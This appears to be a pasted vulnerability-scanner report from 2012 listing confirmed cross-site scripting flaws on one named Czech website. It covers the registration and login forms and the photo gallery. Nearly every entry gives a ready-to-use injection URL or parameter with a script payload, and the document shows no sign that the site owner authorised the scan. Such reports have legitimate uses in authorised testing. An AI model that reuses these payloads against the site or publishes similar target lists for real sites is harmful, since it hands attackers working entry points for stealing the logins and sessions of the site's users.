sroub3k

pucika.zlatas.cz

Apr 12th, 2012
||| XSS (Cross-site Scripting)

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: EMAIL
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0000A9)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: JMENO
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0000B0)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: USERNAME
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0000D8)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: PRIJMENI
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0001B0)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a2&action=sendreg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: EMAIL
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0001B7)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: USERNAME
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0001C0)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder="><script>alert(9)</script>&gname=Brigáda a rozehrávání 2011
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: folder
Parameter Type: Querystring
Attack Pattern: "><script>alert(9)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0002F9)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: gname
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0002F9)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: USERNAME
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0003A8)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003B2)</script>&gname=BrigAƒÂ!da
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: img
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/003.JPG&gname='"--></style></script><script>alert(0x0003B6)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: gname
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003B6)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003BC)</script>&dalsi=1000&gname=BrigA!da
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: img
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/001.JPG&dalsi=1000&gname='"--></style></script><script>alert(0x0003D2)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: gname
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003D2)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder='"--></style></script><script>alert(0x0003E0)</script>&gname=BrigAƒÂ!da
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: folder
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003E0)</script>

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0003E1)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: gname
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>

||| Permanent Cross-site Scripting

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=;ns:expression(netsparker(0x0000BA));&action=sendreg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
Parameter Name: page
Parameter Type: Querystring
Attack Pattern: ;ns:expression(netsparker(0x0000BA));

||| [Possible] Permanent Cross-site Scripting

Severity : Important
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
Parameter Name: EMAIL
Parameter Type: Post
Attack Pattern: '+NSFTW+'